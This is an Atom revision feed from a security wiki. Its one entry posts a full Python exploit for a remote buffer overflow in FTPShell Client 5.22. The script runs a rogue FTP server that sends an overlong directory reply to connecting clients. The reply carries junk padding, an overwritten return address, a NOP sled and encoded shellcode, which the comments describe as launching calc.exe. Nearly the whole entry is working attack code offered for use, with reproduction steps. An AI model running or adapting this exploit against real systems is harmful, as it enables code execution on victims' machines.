<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=FTPShell_Client_5.22_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>FTPShell Client 5.22 遠程緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=FTPShell_Client_5.22_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=FTPShell_Client_5.22_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-21T05:45:40Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=FTPShell_Client_5.22_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1516&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/python    # Exploit Title     : FTPShell Client 5.22 - Remote Buffer Overflow   # Discovery by      : Shubham Singh # Known As          : Spirited Wol...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=FTPShell_Client_5.22_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1516&amp;oldid=prev"/>
		<updated>2021-04-11T01:30:41Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/python    # Exploit Title     : FTPShell Client 5.22 - Remote Buffer Overflow   # Discovery by      : Shubham Singh # Known As          : Spirited Wol...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
  &lt;br /&gt;
# Exploit Title     : FTPShell Client 5.22 - Remote Buffer Overflow  &lt;br /&gt;
# Discovery by      : Shubham Singh&lt;br /&gt;
# Known As          : Spirited Wolf [Twitter: @Pwsecspirit]&lt;br /&gt;
# Email             : spiritedwolf@protonmail.com&lt;br /&gt;
# Youtube Channel   : www.youtube.com/c/Pentestingwithspirit &lt;br /&gt;
# Discovey Date    : 17/07/2018&lt;br /&gt;
# Software Link     : https://ftpshell-client.soft32.com/&lt;br /&gt;
# Tested Version    : 5.22&lt;br /&gt;
# Tested on OS      : Windows XP Service Pack 3 x86&lt;br /&gt;
# Steps to Reproduce: Run the python script to start the exploit on your favourite port number and then open FTPShell Client 5.22 software , give your IP Address and port and click on connect.&lt;br /&gt;
# Greetz            : @hexachordanu @FuzzySec @LiveOverflow&lt;br /&gt;
import socket&lt;br /&gt;
import sys&lt;br /&gt;
&lt;br /&gt;
port = 1337&lt;br /&gt;
junk = &amp;quot;A&amp;quot; * 400&lt;br /&gt;
#Badchars \x00\x0a\x0d\x22&lt;br /&gt;
#7CAD6A3E   55               PUSH EBP&lt;br /&gt;
eip = &amp;quot;\x3e\x6a\xad\x7c&amp;quot;        #!mona jmp -r ebp&lt;br /&gt;
nops = &amp;quot;\x90&amp;quot; * 20&lt;br /&gt;
#Shellcode: calc.exe &lt;br /&gt;
shellcode = &amp;quot;\xb8\x01\xf9\x4b\x3e\xda\xd3\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x31\x83\xee\xfc\x31\x46\x0f\x03\x46\x0e\x1b\xbe\xc2\xf8\x59\x41\x3b\xf8\x3d\xcb\xde\xc9\x7d\xaf\xab\x79\x4e\xbb\xfe\x75\x25\xe9\xea\x0e\x4b\x26\x1c\xa7\xe6\x10\x13\x38\x5a\x60\x32\xba\xa1\xb5\x94\x83\x69\xc8\xd5\xc4\x94\x21\x87\x9d\xd3\x94\x38\xaa\xae\x24\xb2\xe0\x3f\x2d\x27\xb0\x3e\x1c\xf6\xcb\x18\xbe\xf8\x18\x11\xf7\xe2\x7d\x1c\x41\x98\xb5\xea\x50\x48\x84\x13\xfe\xb5\x29\xe6\xfe\xf2\x8d\x19\x75\x0b\xee\xa4\x8e\xc8\x8d\x72\x1a\xcb\x35\xf0\xbc\x37\xc4\xd5\x5b\xb3\xca\x92\x28\x9b\xce\x25\xfc\x97\xea\xae\x03\x78\x7b\xf4\x27\x5c\x20\xae\x46\xc5\x8c\x01\x76\x15\x6f\xfd\xd2\x5d\x9d\xea\x6e\x3c\xcb\xed\xfd\x3a\xb9\xee\xfd\x44\xed\x86\xcc\xcf\x62\xd0\xd0\x05\xc7\x2e\x9b\x04\x61\xa7\x42\xdd\x30\xaa\x74\x0b\x76\xd3\xf6\xbe\x06\x20\xe6\xca\x03\x6c\xa0\x27\x79\xfd\x45\x48\x2e\xfe\x4f\x2b\xb1\x6c\x13\x82\x54\x15\xb6\xda&amp;quot;&lt;br /&gt;
padding = &amp;quot;C&amp;quot; * (1000 - len(junk) - len(eip) -len(shellcode))&lt;br /&gt;
buffer = junk + eip + nops +  shellcode + padding&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;
        s.bind((&amp;quot;0.0.0.0&amp;quot;, port))&lt;br /&gt;
        s.listen(5)&lt;br /&gt;
        print(&amp;quot;FTP server started on port: &amp;quot;+str(port)+&amp;quot;\r\n&amp;quot;)&lt;br /&gt;
except:&lt;br /&gt;
        print(&amp;quot;Failed to bind the server to port: &amp;quot;+str(port)+&amp;quot;\r\n&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
while True:&lt;br /&gt;
    conn, addr = s.accept()&lt;br /&gt;
    conn.send('220 Welcome to your spirited wolf FTP server\r\n')&lt;br /&gt;
    print(conn.recv(1024))&lt;br /&gt;
    conn.send(&amp;quot;331 OK\r\n&amp;quot;)&lt;br /&gt;
    print(conn.recv(1024))&lt;br /&gt;
    conn.send('230 OK\r\n')&lt;br /&gt;
    print(conn.recv(1024))&lt;br /&gt;
    conn.send('220 &amp;quot;'+buffer+'&amp;quot; is current directory\r\n')&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>